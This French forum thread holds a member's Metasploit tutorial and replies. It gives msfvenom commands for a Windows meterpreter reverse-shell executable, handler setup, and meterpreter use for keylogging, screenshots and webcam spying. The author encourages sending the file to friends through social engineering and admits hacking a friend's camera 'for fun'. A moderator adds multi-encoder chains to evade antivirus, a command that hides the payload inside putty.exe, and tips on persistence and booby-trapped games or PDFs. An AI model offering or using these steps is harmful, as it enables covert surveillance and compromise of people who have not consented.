Auteur Sujet: tutoriel metasploit créer un virus, enregistrer les frappes de clavier  (Lu 3719 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
tutoriel metasploit créer un virus enregistrer les frappes de clavier prendre des capture d'écran prendre une photo avec la caméra , visionner la caméra sur un ordinateur infecté

j'ai vu qu'il avais un tutoriel avec juste un lien metasploit mais pas aussi complet que les mien donc j'ai décider que sa valais la peine de poster mon tutoriel.



Metasploit est installer par défaut sous kali sinon vous pouvez l'installer sous windows ou linux

MEtasploit C’est un framework, ce qui signifie que c’est un ensemble de nombreux logiciels.
Sa sert à  collecter des informations, créer des logiciels malveillants, pirater des FTP, pirater un téléphone Android et bien d’autres choses.

aller dans applications et outils d'exploitation lancer le

Dans Metasploit exploit signifie exploiter. Si vous avez installé le shell inversé correctement sur la machine cible, vous pouvez explorer le système avec l’aide d’exploit. Par défaut, 1590 exploits sont disponibles dans Metasploit.


Vocabulaire
LHOST : lhost est l’adresse IP de l’attaquant
LPORT : C’est le port que vous souhaitez utiliser
RHOST : Ceci est l’adresse IP de la machine victime
RPORT : Le numéro de port de la victime.


Autre maniere de lancer metasploit
Ouvrez Terminal et entrez :

root@kali:~# service postgresql start
Cela aide à faire tourner Metasploit avec la base de donnée postgresql.

Entrez maintenant :

root@kali:~# msfconsole
Payload
Le payload est un bout de code qui permet de pirater le système et exploit aide à faire tout ce que vous voulez faire avec la machine piratée. Cela vous aide à créer un virus.




root@kali:~$ Show exploitsvous pouvez utiliser la touche "tab" proche de la touche 1 pour que l'autocomplétion  pour que sa complete ce que vous écrivez
genre show ex "tab" ploits sa va rajouter sa automatiquement

Cette commande affichera tous les exploits.
L'exploit sert à explorer le système avec l’aide d’exploit. IL y a un description élgargisser le terminal/bash/shell/command-line/prompt



voici les commandes [pour utiliser n’importe quel exploit, il suffit d’entrer : use nom de l’exploit]
msf5 >   use windows/winrm/winrm_script_exec
show options. montre les options de l'exploit

msf5 exploit(windows/winrm/winrm_script_exec) > show options
Pirater Windows avec Metasploit
Utilisons msfvenom pour créer un virus (nous utilisions un payload bout de code qui sert a pirater un système d'exploitation), sorter de metasploit en tapant exit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.xxx LPORT=4444 -f exe-only --arch x86 --platform win -o ~/evil.exe

-p fait le payload et le nom c'est le nom du payload
LHOST comme dis plus haut c'est notre ip LPORT c'est le port local -f c'est le type d'extensioN --arch ou -a c'est l'architecture --platform c'est le système d'exploitation -o c'est le fichier/programme à créer  le virus quoi la je lai mis dans mon ~ ou /root dans mon  répertoire "home" de mon utilisateur (root)

Note : entrez ces arguments dans l’ordre où je les ai entrés, si vous inversez la position des arguments, alors Metasploit ne pourra pas créer le virus.

Se virus sert à quoi aller voir plus tard!


msf5 > use multi/handler pour installer le payload nous devons taper sa en premier,puis;
pour  installer le Payload.
msf5 > set payload windows/meterpreter/reverse_tcp
Payload devrait être le même que celui que vous avez utilisé pour créer le malware.

Votre LHOST est votre adresse IP, vous savez comment l’entrer. Si vous ne connaissez pas votre adresse IP, ouvrez un nouvel onglet en appuyant sur maj+ctrl+T et entrez ifconfig, cela affichera votre adresse IP locale.

msf5 > set lhost 192.1.0.243
msf5 > set lport 4444 même port que l'on a utiliser tout a l'heure
tapez maintenant run ou exploit

Maintenant envoyez juste ce virus à vos amis. Utilisez vos compétences en ingénierie sociale ^^.

Dans mon cas j’utilise Virtualbox, donc je fais juste un copier coller sur ma clé usb car le mode glisser déposer n'est pas fonctionnel

Quand la victime lance ce programme, vous allez voir que Metasploit et Meterpreter s’ouvriront, comme le montre la capture d’écran.

  • Started reverse TCP handler on 192.168.0.xxx:4444
  • Sending stage (179779 bytes) to 192.1.0.1 ip de la victime parfait pour une attaque ddos en plus
  • Meterpreter session 1 opened (192.168.0.xxx:4444 -> 192.1.0.1:50569 ip de la victime) at 2019-05-19 08:52:48 -0400



Cela veut dire que vous avez piraté la machine victime avec succès. Voici quelques opérations importantes que vous pouvez effectuer sur la machine victime.

tapez “help”
meterpreter > help pour voir les options si vous savez lire l'anglais vous aller voir qu'on peut faire pas mal de chose intéressante
Je vais utiliser les principales commmandes pour vous les montrer
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes


Vous pouvez prendre des photos depuis la webcam, ou enregistrer des vidéos live.
Enregistrer les frappes du clavier (keylogger)
Télécharger ou Uploader des fichiers sur la machine victime.
Eteindre ou redémarrer l’ordinateur.
nous allons voir tout les options possibles

msf5 exploit(multi/handler) > exit  termine la session meterpreter en cours

msf5 exploit(multi/handler) > help obtient le menu d'aide
vous pouvez aussi faire
help commande
help exit par exemple(meme si il a pas d'aide pour exit)

msf5 exploit(multi/handler) > quit   termine la session meterpreter en cours

msf5 exploit(multi/handler) > ifconfig ou ipconfig
 affiche  les interfaces de l'utilisateur pirater (son ip masque de sous réseau,etc)

msf5 exploit(multi/handler) > ps listes les processus en cours
msf5 exploit(multi/handler) > kill pid1 pid2 tue les/le processus en cours d'exécution sur la machine infecté
par exemple
kill 6408 qui est la command line et hop ta tout perdu !

msf5 exploit(multi/handler) >pkill cmd.exetu le processus par son nom par exmple ici cmd.exe
msf5 exploit(multi/handler) > rebootredemarre sa machine !!!!!!

msf5 exploit(multi/handler) > shellutilise le shell windows(command-line) sur le poste de la victime vous pouvez tout faire supprimer des dossier faire un  shutdown redémarrer et plus encore

msf5 exploit(multi/handler) >shutdownéteint la machine a distance
voici quelque options(help shutdown)
shutdown /t 0 /f /s
/t temps d'exécution avant que la l'ordinateur se ferme
/f force les applications a quitter
/s ferme l'ordinateur

msf5 exploit(multi/handler) >sysinfoobtient des information sur le système comme son nom son OS le nombre d'utilisateur
msf5 exploit(multi/handler) >keyscan_start commence a capture ce qui est écrit au clavier a combiner avec keyscan_dump et keyscan_dump
msf5 exploit(multi/handler) >keyscan_dumppendant que vous avez taper keyscan_start taper keyscan_dump pour décharger comme les vider  les frappes de clavier 
msf5 exploit(multi/handler) >keyscan_stop arrete la capture de frappe de clavier
msf5 exploit(multi/handler) >screenshootrien a dire la dessus le fichier est sauvegarder dans le chemin qu'il vous indique surement celui en cours

Webcam Commands

msf5 exploit(multi/handler) >webcam_listpermet de lister les caméra disponible si vous avez une opération rater c'est quil en a pas

msf5 exploit(multi/handler) >webcam_snapprendre une photo avec  la caméra

msf5 exploit(multi/handler) >webcam_streamvoir avec la caméra en temps réel


pour resumer un session ou si la personne se déconnecter pater dans multi/handler sessions et la vous voyez sont ip et le nom de son ordinateur prenez le en notes dès que vous hacker un pc comme sa vous savez c'est qui


Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3785
  • +263/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
j'ai vu qu'il avais un tutoriel avec juste un lien metasploit mais pas aussi complet que les mien donc j'ai décider que sa valais la peine de poster mon tutoriel.
à l'époque j'avais fais ce tuto  https://linuxtrack.net/viewtopic.php?id=973 mais il n'est plus à jour

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Salut!   :)

Tout d'abord félicitation pour la présentation, c'est déjà bien mieux et donc plus lisible...

Par contre, plusieurs points que tu peux largement améliorés:

          -Tu aurais pu prendre un exe existant et cacher ton code dedans. Pus discret.

           -Tu ne parles pas d'encoder, afin que l'av ne puisse pas te détecter. Tu as sûrement désactivé l'av de la victime? Ou tu as eu un message pour te dire "attention danger". L'av de désactivé, ce n'est jamais le cas, et quand l'utilisateur voit un message "qui fait peur", il ne clique pas sur le lien...

           -Ni de techniques d'évasions... D'analyse par base de signature ou d’analyse heuristique.

           -Ni de migrer ton processus afin d'éviter que l'utilisateur le trouve et le kill.

           -Ni de rendre ton processus persistant, ce qui est trés important, car sinon, dés qu'il eteindra son ordi ou reboot, tu perdras lta session, et il faudra attendre qu'il re-clic sur l'exe, et si tu n'as pas caché l'exploit dans une application windows, ou un pdf, etc... Il ne recliquera jamais dessus 2 fois.

           -Tu aurais pu aussi, par exemple compromettre un jeux, ça aurait été marrant. (ou un pdf...)     

            => Surtout, tu ne parles que d'Exploit Asynchrone... Si l'utilisateur ne clique pas sur ton lien, tu n'auras pas de session meterpreter!! Tu te limites a une seul utilisation de metasploit alors qu'il y en a plusieurs, bien plus intérressantes... T'aurais pu parler un peu des CVE.

            -ça se voit que tu t'es inspiré de https://h5ckfun.info/tutoriel-metasploit-pour-debutants-maitrisez-en-5-minutes/ , car il y a des phrases identiques, tu aurait dû citer ta source, ça aurait été plus ethique.

Sinon, tu t'es appliqués, a toi de voir si tu veux rajouter les propositions que je t'ai faite et les développer evidement.
Tchao   8)
Snk
« Modifié: 19 mai 2019 à 21:10:08 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
merci pour le conseille , ouais je sais je suis un noob et jme suis inspiré de lui et d'un autre l'encodage j'ai utilisé shellter et le reste des termes utiliser je comprend rien du tout j'aurais bien aimer les aborder et je pensais quon pouvais restaurer une session fermer ? non ?  et oui ce tutoriel est seulement pour le fun car ses vraiment pas un gros virus même windows defender la trouver ! c'étais juste pour le fun d'hacker un ami 10 minutes et d'accèder à sa caméra et frappe de clavier je sais que ses un peu inutile mais je voulais quand même le poster et je fais mes recherches pour en ramener d'autre plus intéressant 👍

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
à l'époque j'avais fais ce tuto  https://linuxtrack.net/viewtopic.php?id=973 mais il n'est plus à jour

C'est vrai qu'il était bien...
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Windows defender l'a trouvé car tu n'as pas encoder ou multi-encoder.
Fait la même chose en comprometant un jeux, c'est plus instructif... (ou un pdf)
Pour encoder plusieurs fois, par exemple:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.17 LPORT=4444 -a x86 --platform windows -f raw -e x86/bloxor -i 7 | \
> msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | \
> msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o encoders.exe

Ou alors utiliser bf_xor, avec une seule itération, optient de très bon résultat, et en le cachant dans putty.exe par exemple:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=443 -a x86 --platform windows -f raw -x putty.exe -f exe-only -e x86/bf_xor -o putty2.exe
Et aprés tu les tests.

Si tu ne déplaces pas ton processus et tu le fais reboot, tu perdras la connection... D'ou l'utilité d'une persistence pour avoir une connection a chaque fois que l'ordi est allumé.

Mais tout ça n'est que des Exploits Asynchrones, il y a d'autres techniques.
« Modifié: 19 mai 2019 à 21:58:28 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
ok  merci t'est fort !

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Merci, mais malheureusement, Non... ce n'est pas le cas!  :'(
Encore énormément de travail avant d'arriver a un niveau décent...   :P
On en apprend tout les jours, a condition de travailler, la route est très longue, tu t'en rendras vite compte. Il faut beaucoup d'acharnement, de motivation, de recherches et surtout de temps avant de pouvoir dire un jour,  "je suis bon"!! Surtout, quand cela n'est pas ton métier, car je ne suis qu'un passionné.
Je ne sais plus qui disait cela: "La seule chose que je sais, c'est que je ne sais rien", cette phrase est réellement vrai pour l'informatique. (Et pas que...)  :o
Tchao A+
« Modifié: 19 mai 2019 à 23:13:32 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Le tuto est basique mais beaucoup mieux que les précédents , donc bravo.
Je pense que Snk a déja donné beaucoup de solutions possibles pour améliorer ça, moi pour rajouter juste ma goute de sel , je préfère codé un reverse_tcp (qui désolé mais n'est pas un virus) en assembleur ,  et modifié le code et la signature au besoin :) et pourquoi pas encodé/chiffré dérrière , je pratique beaucoup ça au boulot et ça marche bien :)
Mess  with the bests.
Die like the rest.

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
C'est sur que faire un reverse_tcp soit méme est bien plus instructif, et pas très compliqué, mais demande quand même certaines connaissances... Et la signature sera pas reconnu.   8)
« Modifié: 20 mai 2019 à 12:02:49 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Sauf si tu signes avec l'outils fourni par windaube xD
Mess  with the bests.
Die like the rest.

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
ok ouais prochain tutoriel je vais m'assurer que c'est plus complexe et windmerde je l'appelle perso ! j'ai fais une mise a jour et mon ordi voulais plus démarrer !

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2490
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Windaube toujours plus
Mess  with the bests.
Die like the rest.

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1393
  • +98/-1
  • Multiboot Linux - Kali en Amateur - python(A)
C'est pas nouveau... C'est Windobe...  ::)
Une grosse daube....   ;)  Le pire c'est qu'il ose faire payer pour ça!
« Modifié: 20 mai 2019 à 19:18:33 par Snk »
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
A l'époque c'était système_D (Comme démerdes-toi!)
Anti GAFAM - Brûlons les tous!

Hors ligne rezohs21

  • Membre régulier
  • **
  • Messages: 58
  • +2/-0
a je connaisais pas  :o